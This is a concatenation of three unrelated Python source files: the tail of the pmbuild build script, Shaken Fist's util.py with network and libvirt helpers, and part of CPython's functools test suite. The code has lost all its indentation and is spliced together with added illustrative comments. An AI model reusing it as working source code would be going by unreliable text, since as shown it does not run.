print(" dir: <path to makefiles, xcodeproj, etc>")
print("]")
print("\ncommandline options.")
print("-make <target> <config> <flags>")
print(" target can be all, or basic_texture etc.")
print("config=<debug, release, etc>")
print("any additional flags after these will be forwarded to the build toolchain")
print("\n")
def run_help(config):
print("run help ------------------------------------------------------------------------")
print("---------------------------------------------------------------------------------")
print("\njsn syntax:")
print("run: {")
print(" cmd: <template of command to run>")
print(" use %target% as a var to replace target names in bin dir, ie %target%.exe ")
print(" dir: <path to bin directory>")
print(" ext: <.exe, .app, ''>")
print("]")
print("\ncommandline options.")
print("-run <target> <flags>")
print(" target can be all or basic_texture etc, name is passed as %target% in run:{ cmd: }")
print(" debug binaries with have _d suffix so use basic_texture_d to run the debug exe")
print("any additional flags after these will be forwarded to the executable")
print(" use -test to run the example tests")
print("\n")
def cr_help(config):
print("cr help -------------------------------------------------------------------------")
print("---------------------------------------------------------------------------------")
print("generate cfunction pointers for calling from fungos/cr")
print("\njsn syntax: array of commands.")
print("cr: {")
print(" files:[...], output: <filepath>")
print("}")
print("\n")
# print duration of job, ts is start time
def print_duration(ts):
millis = int((time.time() - ts) * 1000)
print("--------------------------------------------------------------------------------")
print("Took (" + str(millis) + "ms)")
# stub for jobs to do nothing
def stub(config):
pass
# main function
def main():
start_time = time.time()
# must have config.jsn in working directory
if not os.path.exists("config.jsn"):
print("[error] no config.jsn in current directory.")
exit(1)
# load jsn, inherit etc
config_all = jsn.loads(open("config.jsn", "r").read())
# top level help
if "-help" in sys.argv or len(sys.argv) == 1:
if len(sys.argv) <= 2:
pmbuild_help(config_all)
exit(0)
call = "run"
if "-help" in sys.argv:
call = "help"
# first arg is build profile
if call == "run":
if sys.argv[1] not in config_all:
print("[error] " + sys.argv[1] + " is not a valid pmbuild profile")
exit(1)
config = config_all[sys.argv[1]]
# load user config for user-specific values (sdk version, vcvarsall.bat etc.)
configure_user(config, sys.argv)
if "-cfg" in sys.argv:
print(json.dumps(config, indent=4))
else:
config = config_all["base"]
# tasks are executed in the order they are declared here
tasks = collections.OrderedDict()
tasks["vs_version"] = {"run": run_vs_version, "help": vs_version_help}
tasks["libs"] = {"run": run_libs, "help": libs_help, "exclusive": True}
tasks["premake"] = {"run": run_premake, "help": premake_help}
tasks["pmfx"] = {"run": run_pmfx, "help": pmfx_help}
tasks["models"] = {"run": run_models, "help": models_help}
tasks["textures"] = {"run": run_textures, "help": textures_help}
tasks["jsn"] = {"run": run_jsn, "help": jsn_help}
tasks["copy"] = {"run": run_copy, "help": copy_help}
tasks["build"] = {"run": run_build, "help": build_help}
tasks["cr"] = {"run": run_cr, "help": cr_help}
tasks["make"] = {"run": stub, "help": make_help, "exclusive": True}
tasks["run"] = {"run": stub, "help": run_help, "exclusive": True}
# clean is a special task which must be specified separately
if "-clean" in sys.argv:
if call == "help":
clean_help(config)
else:
run_clean(config)
# run tasks in the order they are specified.
for key in tasks.keys():
if call == "run":
if key not in config.keys():
continue
ts = time.time()
run = False
# check flags to include or exclude jobs, pmbuild <profile> with no args is equivalent to passing -all
if ("-all" in sys.argv or len(sys.argv) == 2) and "-n" + key not in sys.argv:
if "exclusive" in tasks[key].keys():
if tasks[key]["exclusive"]:
continue
run = True
elif len(sys.argv) != 2 and "-" + key in sys.argv:
run = True
# run job
if run:
tasks[key][call](config)
print_duration(ts)
# metadata for rebuilding and hot reloading
generate_pmbuild_config(config, sys.argv[1])
# make and run need to forward args
if "-make" in sys.argv:
i = sys.argv.index("-make") + 1
options = []
while i < len(sys.argv):
options.append(sys.argv[i])
i += 1
if call == "help":
pass
else:
run_make(config, options)
if "-run" in sys.argv:
i = sys.argv.index("-run") + 1
options = []
while i < len(sys.argv):
options.append(sys.argv[i])
i += 1
if call == "help":
pass
else:
run_exe(config, options)
print("--------------------------------------------------------------------------------")
print("all jobs complete --------------------------------------------------------------")
print_duration(start_time)
# entry point of pmbuild
if __name__ == "__main__":
print("--------------------------------------------------------------------------------")
print("pmbuild (v3) -------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
print("")
main()
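# Illustrative sketch (not part of pmbuild itself): a minimal config.jsn and the
# command lines that would drive it, assembled from the help text above. The
# profile and directory names ("win32", "bin", "assets", etc.) are assumptions
# for this example only.
#
#   {
#       base: {
#       },
#       win32: {
#           vs_version: "latest",
#           clean: [["bin"], ["temp"]],
#           premake: [["vs2017"]],
#           textures: [["assets/textures", "bin/data/textures"]],
#           copy: [["assets/fonts", "bin/data/fonts"]]
#       }
#   }
#
# Typical invocations, matching the flag handling in main():
#   pmbuild win32                      # runs all non-exclusive tasks for the win32 profile
#   pmbuild win32 -premake -textures   # runs only the listed tasks
#   pmbuild win32 -make all release    # explicit task; remaining args forwarded to the toolchain
#   pmbuild win32 -run basic_texture   # explicit task; runs the built executable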
|
util.py
|
# Copyright 2020 Michael Still
import importlib
import json
import multiprocessing
from pbr.version import VersionInfo
import random
import re
import requests
import secrets
import string
import sys
import time
import traceback
from oslo_concurrency import processutils
from shakenfist import db
from shakenfist.config import config
from shakenfist import logutil
LOG, _ = logutil.setup(__name__)
class RecordedOperation():
def __init__(self, operation, relatedobject):
self.operation = operation
self.object = relatedobject
def __enter__(self):
self.start_time = time.time()
object_type, object_uuid = self.unique_label()
if object_type and object_uuid:
db.add_event(object_type, object_uuid,
self.operation, 'start', None, None)
return self
def __exit__(self, *args):
duration = time.time() - self.start_time
log = LOG
object_type, object_uuid = self.unique_label()
if object_uuid:
if object_type:
db.add_event(object_type, object_uuid,
self.operation, 'finish', duration, None)
log = LOG.withObj(self.object)
else:
log = LOG.withField('label', self.object)
log.withField('duration', duration).info('Finish %s', self.operation)
def unique_label(self):
if self.object:
if isinstance(self.object, str):
object_type = None
object_uuid = self.object
else:
object_type, object_uuid = self.object.unique_label()
else:
object_type = None
object_uuid = None
return object_type, object_uuid
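# Illustrative usage (assumption, not taken from the original module): RecordedOperation
# is a context manager that emits a 'start' event on entry and a 'finish' event with the
# measured duration on exit. The operation name and object below are hypothetical.
#
#     with RecordedOperation('fetch image', instance):
#         ...   # work to be timed and recorded against 'instance'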
def is_network_node():
"""Test if this node is the network node."""
return config.NODE_IP == config.NETWORK_NODE_IP
def check_for_interface(name, up=False):
stdout, stderr = execute(None,
'ip link show %s' % name, check_exit_code=[0, 1])
if stderr.rstrip('\n').endswith(' does not exist.'):
return False
if up:
return bool(re.match(r'.*[<,]UP[,>].*', stdout))
return True
def get_interface_addresses(namespace, name):
in_namespace = ''
if namespace:
in_namespace = 'ip netns exec %s ' % namespace
stdout, _ = execute(None,
'%(in_namespace)sip addr show %(name)s'
% {
'in_namespace': in_namespace,
'name': name
},
check_exit_code=[0, 1])
if not stdout:
return
inet_re = re.compile(r' +inet (.*)/[0-9]+.*')
for line in stdout.split('\n'):
m = inet_re.match(line)
if m:
yield m.group(1)
return
def get_default_routes(namespace):
in_namespace = ''
if namespace:
in_namespace = 'ip netns exec %s ' % namespace
stdout, _ = execute(None,
'%(in_namespace)sip route list default'
% {
'in_namespace': in_namespace
})
if not stdout:
return []
routes = []
for line in stdout.split('\n'):
elems = line.split(' ')
if len(elems) > 3 and elems[2] not in routes:
routes.append(elems[2])
return routes
def get_safe_interface_name(interface):
if len(interface) > 15:
orig_interface = interface
interface = interface[:15]
LOG.info('Interface name truncated from %s to %s'
% (orig_interface, interface))
return interface
def create_interface(interface, interface_type, extra):
interface = get_safe_interface_name(interface)
execute(None,
'ip link add %(interface)s type %(interface_type)s %(extra)s'
% {'interface': interface,
'interface_type': interface_type,
'extra': extra})
def nat_rules_for_ipblock(ipblock):
out, _ = execute(None, 'iptables -t nat -L POSTROUTING -n -v')
# Output looks like this:
# Chain POSTROUTING (policy ACCEPT 199 packets, 18189 bytes)
# pkts bytes target prot opt in out source destination
# 23 1736 MASQUERADE all -- * ens4 192.168.242.0/24 0.0.0.0/0
for line in out.split('\n'):
if line.find(str(ipblock)) != -1:
return True
return False
LIBVIRT = None
def get_libvirt():
global LIBVIRT
if not LIBVIRT:
LIBVIRT = importlib.import_module('libvirt')
return LIBVIRT
def extract_power_state(libvirt, domain):
state, _ = domain.state()
if state == libvirt.VIR_DOMAIN_SHUTOFF:
return 'off'
if state == libvirt.VIR_DOMAIN_CRASHED:
return 'crashed'
if state in [libvirt.VIR_DOMAIN_PAUSED,
libvirt.VIR_DOMAIN_PMSUSPENDED]:
return 'paused'
# Covers all "running states": BLOCKED, NOSTATE,
# RUNNING, SHUTDOWN
return 'on'
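# Illustrative sketch (assumption, not part of the module): resolving a domain's
# power state through the lazily imported libvirt module. The connection URI and
# domain name below are hypothetical.
#
#     libvirt = get_libvirt()
#     conn = libvirt.open('qemu:///system')
#     dom = conn.lookupByName('instance-00000001')
#     state = extract_power_state(libvirt, dom)   # 'on', 'off', 'paused' or 'crashed'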
def get_api_token(base_url, namespace='system'):
with db.get_lock('namespace', None, namespace,
op='Get API token'):
auth_url = base_url + '/auth'
LOG.info('Fetching %s auth token from %s' % (namespace, auth_url))
ns = db.get_namespace(namespace)
if 'service_key' in ns:
key = ns['service_key']
else:
key = ''.join(secrets.choice(string.ascii_lowercase)
for i in range(50))
ns['service_key'] = key
db.persist_namespace(namespace, ns)
r = requests.request('POST', auth_url,
data=json.dumps({
'namespace': namespace,
'key': key
}),
headers={'Content-Type': 'application/json',
'User-Agent': get_user_agent()})
if r.status_code != 200:
raise Exception('Unauthorized')
return 'Bearer %s' % r.json()['access_token']
CACHED_VERSION = None
def get_version():
global CACHED_VERSION
if not CACHED_VERSION:
CACHED_VERSION = VersionInfo('shakenfist').version_string()
return CACHED_VERSION
def get_user_agent():
return 'Mozilla/5.0 (Ubuntu; Linux x86_64) Shaken Fist/%s' % get_version()
def discover_interfaces():
mac_to_iface = {
'00:00:00:00:00:00': 'broadcast'
}
iface_to_mac = {}
vxid_to_mac = {}
iface_name = None
iface_name_re = re.compile('^[0-9]+: ([^:]+): <')
link_ether = None
link_ether_re = re.compile('^ link/ether (.*) brd .*')
stdout, _ = execute(None, 'ip addr list')
for line in stdout.split('\n'):
line = line.rstrip()
m = iface_name_re.match(line)
if m:
iface_name = m.group(1)
continue
m = link_ether_re.match(line)
if m:
link_ether = m.group(1)
mac_to_iface[link_ether] = iface_name
iface_to_mac[iface_name] = link_ether
if iface_name.startswith('vxlan-'):
vxid = int(iface_name.split('-')[1])
vxid_to_mac[vxid] = link_ether
return mac_to_iface, iface_to_mac, vxid_to_mac
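# Illustrative return shape (values are hypothetical): discover_interfaces() walks
# `ip addr list` output and yields three mappings.
#
#     mac_to_iface = {'00:00:00:00:00:00': 'broadcast', '52:54:00:ab:cd:ef': 'eth0'}
#     iface_to_mac = {'eth0': '52:54:00:ab:cd:ef'}
#     vxid_to_mac  = {42: '6e:1f:2a:bb:cc:dd'}   # from an interface named 'vxlan-42'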
def ignore_exception(processname, e):
msg = '[Exception] Ignored error in %s: %s' % (processname, e)
_, _, tb = sys.exc_info()
if tb:
msg += '\n%s' % traceback.format_exc()
LOG.error(msg)
def _lock_refresher(locks):
while True:
db.refresh_locks(locks)
time.sleep(10)
def execute(locks, command, check_exit_code=[0], env_variables=None):
if not locks:
return processutils.execute(
command, check_exit_code=check_exit_code,
env_variables=env_variables, shell=True)
else:
p = multiprocessing.Process(
target=_lock_refresher, args=(locks,))
p.start()
try:
return processutils.execute(
command, check_exit_code=check_exit_code,
env_variables=env_variables, shell=True)
finally:
p.terminate()
p.join()
def random_macaddr():
return '02:00:00:%02x:%02x:%02x' % (random.randint(0, 255),
random.randint(0, 255),
random.randint(0, 255))
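# Illustrative usage of execute() (assumption, not from the original module): without
# locks it is a thin shell=True wrapper around processutils.execute(); with a list of
# locks it keeps them refreshed in a side process for the duration of the command.
#
#     stdout, stderr = execute(None, 'ip addr list')
#     stdout, stderr = execute([image_lock], 'qemu-img convert src.qcow2 dst.raw')
#     # 'image_lock' and the qemu-img command line are hypothetical.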
|
test_functools.py
|
import abc
import builtins
import collections
import copy
from itertools import permutations
import pickle
from random import choice
import sys
from test import support
import time
import unittest
from weakref import proxy
import contextlib
try:
import threading
except ImportError:
threading = None
import functools
py_functools = support.import_fresh_module('functools', blocked=['_functools'])
c_functools = support.import_fresh_module('functools', fresh=['_functools'])
decimal = support.import_fresh_module('decimal', fresh=['_decimal'])
@contextlib.contextmanager
def replaced_module(name, replacement):
original_module = sys.modules[name]
sys.modules[name] = replacement
try:
yield
finally:
sys.modules[name] = original_module
def capture(*args, **kw):
"""capture all positional and keyword arguments"""
return args, kw
def signature(part):
""" return the signature of a partial object """
return (part.func, part.args, part.keywords, part.__dict__)
class MyTuple(tuple):
pass
class BadTuple(tuple):
def __add__(self, other):
return list(self) + list(other)
class MyDict(dict):
pass
class TestPartial:
def test_basic_examples(self):
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertTrue(callable(p))
self.assertEqual(p(3, 4, b=30, c=40),
((1, 2, 3, 4), dict(a=10, b=30, c=40)))
p = self.partial(map, lambda x: x*10)
self.assertEqual(list(p([1,2,3,4])), [10, 20, 30, 40])
def test_attributes(self):
p = self.partial(capture, 1, 2, a=10, b=20)
# attributes should be readable
self.assertEqual(p.func, capture)
self.assertEqual(p.args, (1, 2))
self.assertEqual(p.keywords, dict(a=10, b=20))
def test_argument_checking(self):
self.assertRaises(TypeError, self.partial) # need at least a func arg
try:
self.partial(2)()
except TypeError:
pass
else:
self.fail('First arg not checked for callability')
def test_protection_of_callers_dict_argument(self):
# a caller's dictionary should not be altered by partial
def func(a=10, b=20):
return a
d = {'a':3}
p = self.partial(func, a=5)
self.assertEqual(p(**d), 3)
self.assertEqual(d, {'a':3})
p(b=7)
self.assertEqual(d, {'a':3})
def test_kwargs_copy(self):
# Issue #29532: Altering a kwarg dictionary passed to a constructor
# should not affect a partial object after creation
d = {'a': 3}
p = self.partial(capture, **d)
self.assertEqual(p(), ((), {'a': 3}))
d['a'] = 5
self.assertEqual(p(), ((), {'a': 3}))
def test_arg_combinations(self):
# exercise special code paths for zero args in either partial
# object or the caller
p = self.partial(capture)
self.assertEqual(p(), ((), {}))
self.assertEqual(p(1,2), ((1,2), {}))
p = self.partial(capture, 1, 2)
self.assertEqual(p(), ((1,2), {}))
self.assertEqual(p(3,4), ((1,2,3,4), {}))
def test_kw_combinations(self):
# exercise special code paths for no keyword args in
# either the partial object or the caller
p = self.partial(capture)
self.assertEqual(p.keywords, {})
self.assertEqual(p(), ((), {}))
self.assertEqual(p(a=1), ((), {'a':1}))
p = self.partial(capture, a=1)
self.assertEqual(p.keywords, {'a':1})
self.assertEqual(p(), ((), {'a':1}))
self.assertEqual(p(b=2), ((), {'a':1, 'b':2}))
# keyword args in the call override those in the partial object
self.assertEqual(p(a=3, b=2), ((), {'a':3, 'b':2}))
def test_positional(self):
# make sure positional arguments are captured correctly
for args in [(), (0,), (0,1), (0,1,2), (0,1,2,3)]:
p = self.partial(capture, *args)
expected = args + ('x',)
got, empty = p('x')
self.assertTrue(expected == got and empty == {})
def test_keyword(self):
# make sure keyword arguments are captured correctly
for a in ['a', 0, None, 3.5]:
p = self.partial(capture, a=a)
expected = {'a':a,'x':None}
empty, got = p(x=None)
self.assertTrue(expected == got and empty == ())
def test_no_side_effects(self):
# make sure there are no side effects that affect subsequent calls
p = self.partial(capture, 0, a=1)
args1, kw1 = p(1, b=2)
self.assertTrue(args1 == (0,1) and kw1 == {'a':1,'b':2})
args2, kw2 = p()
self.assertTrue(args2 == (0,) and kw2 == {'a':1})
def test_error_propagation(self):
def f(x, y):
x / y
self.assertRaises(ZeroDivisionError, self.partial(f, 1, 0))
self.assertRaises(ZeroDivisionError, self.partial(f, 1), 0)
self.assertRaises(ZeroDivisionError, self.partial(f), 1, 0)
self.assertRaises(ZeroDivisionError, self.partial(f, y=0), 1)
def test_weakref(self):
f = self.partial(int, base=16)
p = proxy(f)
self.assertEqual(f.func, p.func)
f = None
self.assertRaises(ReferenceError, getattr, p, 'func')
def test_with_bound_and_unbound_methods(self):
data = list(map(str, range(10)))
join = self.partial(str.join, '')
self.assertEqual(join(data), '0123456789')
join = self.partial(''.join)
self.assertEqual(join(data), '0123456789')
def test_nested_optimization(self):
partial = self.partial
inner = partial(signature, 'asdf')
nested = partial(inner, bar=True)
flat = partial(signature, 'asdf', bar=True)
self.assertEqual(signature(nested), signature(flat))
def test_nested_partial_with_attribute(self):
# see issue 25137
partial = self.partial
def foo(bar):
return bar
p = partial(foo, 'first')
p2 = partial(p, 'second')
p2.new_attr = 'spam'
self.assertEqual(p2.new_attr, 'spam')
def test_repr(self):
args = (object(), object())
args_repr = ', '.join(repr(a) for a in args)
kwargs = {'a': object(), 'b': object()}
kwargs_reprs = ['a={a!r}, b={b!r}'.format_map(kwargs),
'b={b!r}, a={a!r}'.format_map(kwargs)]
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
self.assertEqual(f'{name}({capture!r})', repr(f))
f = self.partial(capture, *args)
self.assertEqual(f'{name}({capture!r}, {args_repr})', repr(f))
f = self.partial(capture, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
f = self.partial(capture, *args, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {args_repr}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
def test_recursive_repr(self):
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
self.assertEqual(repr(f), '%s(...)' % (name,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
self.assertEqual(repr(f), '%s(%r, ...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
self.assertEqual(repr(f), '%s(%r, a=...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
def test_pickle(self):
with self.AllowPickle():
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertEqual(signature(f_copy), signature(f))
def test_copy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.copy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIs(f_copy.attr, f.attr)
self.assertIs(f_copy.args, f.args)
self.assertIs(f_copy.keywords, f.keywords)
def test_deepcopy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.deepcopy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIsNot(f_copy.attr, f.attr)
self.assertIsNot(f_copy.args, f.args)
self.assertIsNot(f_copy.args[0], f.args[0])
self.assertIsNot(f_copy.keywords, f.keywords)
self.assertIsNot(f_copy.keywords['bar'], f.keywords['bar'])
def test_setstate(self):
f = self.partial(signature)
f.__setstate__((capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(signature(f),
(capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), dict(a=10), None))
self.assertEqual(signature(f), (capture, (1,), dict(a=10), {}))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), None, None))
#self.assertEqual(signature(f), (capture, (1,), {}, {}))
self.assertEqual(f(2, b=20), ((1, 2), {'b': 20}))
self.assertEqual(f(2), ((1, 2), {}))
self.assertEqual(f(), ((1,), {}))
f.__setstate__((capture, (), {}, None))
self.assertEqual(signature(f), (capture, (), {}, {}))
self.assertEqual(f(2, b=20), ((2,), {'b': 20}))
self.assertEqual(f(2), ((2,), {}))
self.assertEqual(f(), ((), {}))
def test_setstate_errors(self):
f = self.partial(signature)
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}))
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}, {}, None))
self.assertRaises(TypeError, f.__setstate__, [capture, (), {}, None])
self.assertRaises(TypeError, f.__setstate__, (None, (), {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, None, {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, [], {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, (), [], None))
def test_setstate_subclasses(self):
f = self.partial(signature)
f.__setstate__((capture, MyTuple((1,)), MyDict(a=10), None))
s = signature(f)
self.assertEqual(s, (capture, (1,), dict(a=10), {}))
self.assertIs(type(s[1]), tuple)
self.assertIs(type(s[2]), dict)
r = f()
self.assertEqual(r, ((1,), {'a': 10}))
self.assertIs(type(r[0]), tuple)
self.assertIs(type(r[1]), dict)
f.__setstate__((capture, BadTuple((1,)), {}, None))
s = signature(f)
self.assertEqual(s, (capture, (1,), {}, {}))
self.assertIs(type(s[1]), tuple)
r = f(2)
self.assertEqual(r, ((1, 2), {}))
self.assertIs(type(r[0]), tuple)
def test_recursive_pickle(self):
with self.AllowPickle():
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(RecursionError):
pickle.dumps(f, proto)
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.args[0], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.keywords['a'], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
# Issue 6083: Reference counting bug
def test_setstate_refcount(self):
class BadSequence:
def __len__(self):
return 4
def __getitem__(self, key):
if key == 0:
return max
elif key == 1:
return tuple(range(1000000))
elif key in (2, 3):
return {}
raise IndexError
f = self.partial(object)
self.assertRaises(TypeError, f.__setstate__, BadSequence())
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialC(TestPartial, unittest.TestCase):
if c_functools:
partial = c_functools.partial
class AllowPickle:
def __enter__(self):
return self
def __exit__(self, type, value, tb):
return False
def test_attributes_unwritable(self):
# attributes should not be writable
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertRaises(AttributeError, setattr, p, 'func', map)
self.assertRaises(AttributeError, setattr, p, 'args', (1, 2))
self.assertRaises(AttributeError, setattr, p, 'keywords', dict(a=1, b=2))
p = self.partial(hex)
try:
del p.__dict__
except TypeError:
pass
else:
self.fail('partial object allowed __dict__ to be deleted')
def test_manually_adding_non_string_keyword(self):
p = self.partial(capture)
# Adding a non-string/unicode keyword to partial kwargs
p.keywords[1234] = 'value'
r = repr(p)
self.assertIn('1234', r)
self.assertIn("'value'", r)
with self.assertRaises(TypeError):
p()
def test_keystr_replaces_value(self):
p = self.partial(capture)
class MutatesYourDict(object):
def __str__(self):
p.keywords[self] = ['sth2']
return 'astr'
# Replacing the value during key formatting should keep the original
# value alive (at least long enough).
p.keywords[MutatesYourDict()] = ['sth']
r = repr(p)
self.assertIn('astr', r)
self.assertIn("['sth']", r)
class TestPartialPy(TestPartial, unittest.TestCase):
partial = py_functools.partial
class AllowPickle:
def __init__(self):
self._cm = replaced_module("functools", py_functools)
def __enter__(self):
return self._cm.__enter__()
def __exit__(self, type, value, tb):
return self._cm.__exit__(type, value, tb)
if c_functools:
class CPartialSubclass(c_functools.partial):
pass
class PyPartialSubclass(py_functools.partial):
pass
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialCSubclass(TestPartialC):
if c_functools:
partial = CPartialSubclass
# partial subclasses are not optimized for nested calls
test_nested_optimization = None
class TestPartialPySubclass(TestPartialPy):
partial = PyPartialSubclass
class TestPartialMethod(unittest.TestCase):
class A(object):
nothing = functools.partialmethod(capture)
positional = functools.partialmethod(capture, 1)
keywords = functools.partialmethod(capture, a=2)
both = functools.partialmethod(capture, 3, b=4)
nested = functools.partialmethod(positional, 5)
over_partial = functools.partialmethod(functools.partial(capture, c=6), 7)
static = functools.partialmethod(staticmethod(capture), 8)
cls = functools.partialmethod(classmethod(capture), d=9)
a = A()
def test_arg_combinations(self):
self.assertEqual(self.a.nothing(), ((self.a,), {}))
self.assertEqual(self.a.nothing(5), ((self.a, 5), {}))
self.assertEqual(self.a.nothing(c=6), ((self.a,), {'c': 6}))
self.assertEqual(self.a.nothing(5, c=6), ((self.a, 5), {'c': 6}))
self.assertEqual(self.a.positional(), ((self.a, 1), {}))
self.assertEqual(self.a.positional(5), ((self.a, 1, 5), {}))
self.assertEqual(self.a.positional(c=6), ((self.a, 1), {'c': 6}))
self.assertEqual(self.a.positional(5, c=6), ((self.a, 1, 5), {'c': 6}))
self.assertEqual(self.a.keywords(), ((self.a,), {'a': 2}))
self.assertEqual(self.a.keywords(5), ((self.a, 5), {'a': 2}))
self.assertEqual(self.a.keywords(c=6), ((self.a,), {'a': 2, 'c': 6}))
self.assertEqual(self.a.keywords(5, c=6), ((self.a, 5), {'a': 2, 'c': 6}))
self.assertEqual(self.a.both(), ((self.a, 3), {'b': 4}))
self.assertEqual(self.a.both(5), ((self.a, 3, 5), {'b': 4}))
self.assertEqual(self.a.both(c=6), ((self.a, 3), {'b': 4, 'c': 6}))
self.assertEqual(self.a.both(5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.A.both(self.a, 5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
def test_nested(self):
self.assertEqual(self.a.nested(), ((self.a, 1, 5), {}))
self.assertEqual(self.a.nested(6), ((self.a, 1, 5, 6), {}))
self.assertEqual(self.a.nested(d=7), ((self.a, 1, 5), {'d': 7}))
self.assertEqual(self.a.nested(6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
self.assertEqual(self.A.nested(self.a, 6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
def test_over_partial(self):
self.assertEqual(self.a.over_partial(), ((self.a, 7), {'c': 6}))
self.assertEqual(self.a.over_partial(5), ((self.a, 7, 5), {'c': 6}))
self.assertEqual(self.a.over_partial(d=8), ((self.a, 7), {'c': 6, 'd': 8}))
self.assertEqual(self.a.over_partial(5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
self.assertEqual(self.A.over_partial(self.a, 5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
def test_bound_method_introspection(self):
obj = self.a
self.assertIs(obj.both.__self__, obj)
self.assertIs(obj.nested.__self__, obj)
self.assertIs(obj.over_partial.__self__, obj)
self.assertIs(obj.cls.__self__, self.A)
self.assertIs(self.A.cls.__self__, self.A)
def test_unbound_method_retrieval(self):
obj = self.A
self.assertFalse(hasattr(obj.both, "__self__"))
self.assertFalse(hasattr(obj.nested, "__self__"))
self.assertFalse(hasattr(obj.over_partial, "__self__"))
self.assertFalse(hasattr(obj.static, "__self__"))
self.assertFalse(hasattr(self.a.static, "__self__"))
def test_descriptors(self):
for obj in [self.A, self.a]:
with self.subTest(obj=obj):
self.assertEqual(obj.static(), ((8,), {}))
self.assertEqual(obj.static(5), ((8, 5), {}))
self.assertEqual(obj.static(d=8), ((8,), {'d': 8}))
self.assertEqual(obj.static(5, d=8), ((8, 5), {'d': 8}))
self.assertEqual(obj.cls(), ((self.A,), {'d': 9}))
self.assertEqual(obj.cls(5), ((self.A, 5), {'d': 9}))
self.assertEqual(obj.cls(c=8), ((self.A,), {'c': 8, 'd': 9}))
self.assertEqual(obj.cls(5, c=8), ((self.A, 5), {'c': 8, 'd': 9}))
def test_overriding_keywords(self):
self.assertEqual(self.a.keywords(a=3), ((self.a,), {'a': 3}))
self.assertEqual(self.A.keywords(self.a, a=3), ((self.a,), {'a': 3}))
def test_invalid_args(self):
with self.assertRaises(TypeError):
class B(object):
method = functools.partialmethod(None, 1)
def test_repr(self):
self.assertEqual(repr(vars(self.A)['both']),
'functools.partialmethod({}, 3, b=4)'.format(capture))
def test_abstract(self):
class Abstract(abc.ABCMeta):
@abc.abstractmethod
def add(self, x, y):
pass
add5 = functools.partialmethod(add, 5)
self.assertTrue(Abstract.add.__isabstractmethod__)
self.assertTrue(Abstract.add5.__isabstractmethod__)
for func in [self.A.static, self.A.cls, self.A.over_partial, self.A.nested, self.A.both]:
self.assertFalse(getattr(func, '__isabstractmethod__', False))
class TestUpdateWrapper(unittest.TestCase):
def check_wrapper(self, wrapper, wrapped,
assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
# Check attributes were assigned
for name in assigned:
self.assertIs(getattr(wrapper, name), getattr(wrapped, name))
# Check attributes were updated
for name in updated:
wrapper_attr = getattr(wrapper, name)
wrapped_attr = getattr(wrapped, name)
for key in wrapped_attr:
if name == "__dict__" and key == "__wrapped__":
# __wrapped__ is overwritten by the update code
continue
self.assertIs(wrapped_attr[key], wrapper_attr[key])
# Check __wrapped__
self.assertIs(wrapper.__wrapped__, wrapped)
def _default_update(self):
def f(a:'This is a new annotation'):
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is a bald faced lie"
def wrapper(b:'This is the prior annotation'):
pass
functools.update_wrapper(wrapper, f)
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertIs(wrapper.__wrapped__, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
